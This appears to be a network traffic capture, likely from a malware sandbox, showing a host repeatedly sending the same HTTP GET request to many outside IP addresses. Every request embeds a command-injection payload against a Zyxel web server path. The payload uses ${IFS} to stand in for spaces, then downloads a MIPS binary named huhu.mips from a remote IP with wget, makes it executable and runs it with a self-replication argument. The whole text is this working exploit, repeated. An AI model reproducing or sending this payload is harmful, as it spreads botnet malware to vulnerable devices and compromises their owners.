                                      Jan 19, 2024 17:29:49.108863115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8375192.168.2.144361865.8.108.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108901978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8376192.168.2.1446086138.66.203.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108935118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8377192.168.2.145180476.107.146.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.108968019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8378192.168.2.1440062125.193.3.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109023094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8379192.168.2.145818873.66.232.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109057903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8380192.168.2.1447538170.116.77.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109074116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8381192.168.2.1437160186.171.191.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109103918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8382192.168.2.1435430135.118.47.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109154940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8383192.168.2.1456096156.74.174.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109167099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8384192.168.2.1440702195.135.222.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109235048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8385192.168.2.1442406221.245.170.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109253883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8386192.168.2.1456240137.212.147.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109280109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8387192.168.2.1451890160.175.98.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109338999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8388192.168.2.1456714113.144.141.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109350920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8389192.168.2.143425049.245.38.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109397888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8390192.168.2.1444854173.251.226.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109426975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8391192.168.2.144995849.102.198.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109458923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8392192.168.2.1447480130.148.78.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109519005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8393192.168.2.143593288.221.133.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109559059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8394192.168.2.1458016110.33.172.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109596968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8395192.168.2.14597001.197.32.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109615088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8396192.168.2.145022093.118.89.79443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109653950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8397192.168.2.145570078.72.140.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109683990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8398192.168.2.144907083.73.225.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109749079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8399192.168.2.1441292149.56.107.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109772921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8400192.168.2.143665238.218.77.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109800100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8401192.168.2.1439974126.51.79.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109843016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8402192.168.2.145789881.111.32.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109913111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8403192.168.2.14382222.226.56.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109946966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8404192.168.2.1434624221.70.251.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.109971046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8405192.168.2.1440214114.77.198.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110019922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8406192.168.2.1459534208.125.130.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110050917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8407192.168.2.1448632131.206.127.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110086918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8408192.168.2.145868074.194.192.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110151052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8409192.168.2.1435282125.190.157.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110183954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8410192.168.2.1442226193.10.203.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110223055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8411192.168.2.1456390153.105.189.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110239983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8412192.168.2.1441578109.82.98.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110306025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8413192.168.2.1458212121.123.109.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110331059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8414192.168.2.1452118151.48.223.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110364914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8415192.168.2.1446644171.107.237.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110405922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8416192.168.2.145385659.58.9.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110430956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8417192.168.2.144078278.153.113.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110464096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8418192.168.2.1457966138.56.246.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110500097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8419192.168.2.1455384106.184.190.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110552073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8420192.168.2.1440896168.191.235.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110604048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8421192.168.2.1451786133.183.160.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110625982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8422192.168.2.146032441.242.147.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110661983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8423192.168.2.1452550122.126.119.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110704899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8424192.168.2.1453810190.117.147.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110740900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8425192.168.2.1434018220.238.115.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110766888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8426192.168.2.1439918144.174.171.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110802889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8427192.168.2.144471424.26.22.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110827923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8428192.168.2.1437646195.126.213.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110884905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8429192.168.2.145304846.112.182.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110908985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8430192.168.2.1441306167.49.124.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.110974073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8431192.168.2.1448156115.167.151.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111000061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8432192.168.2.1441836102.190.200.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111041069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8433192.168.2.1453694193.34.238.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111080885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8434192.168.2.1440674182.23.25.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111109018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8435192.168.2.1439836166.145.69.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111161947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8436192.168.2.1447492222.23.36.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111190081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8437192.168.2.1442756207.60.14.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:49.111243963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8438192.168.2.1452216108.48.23.169443
                                      TimestampBytes transferredDirectionData
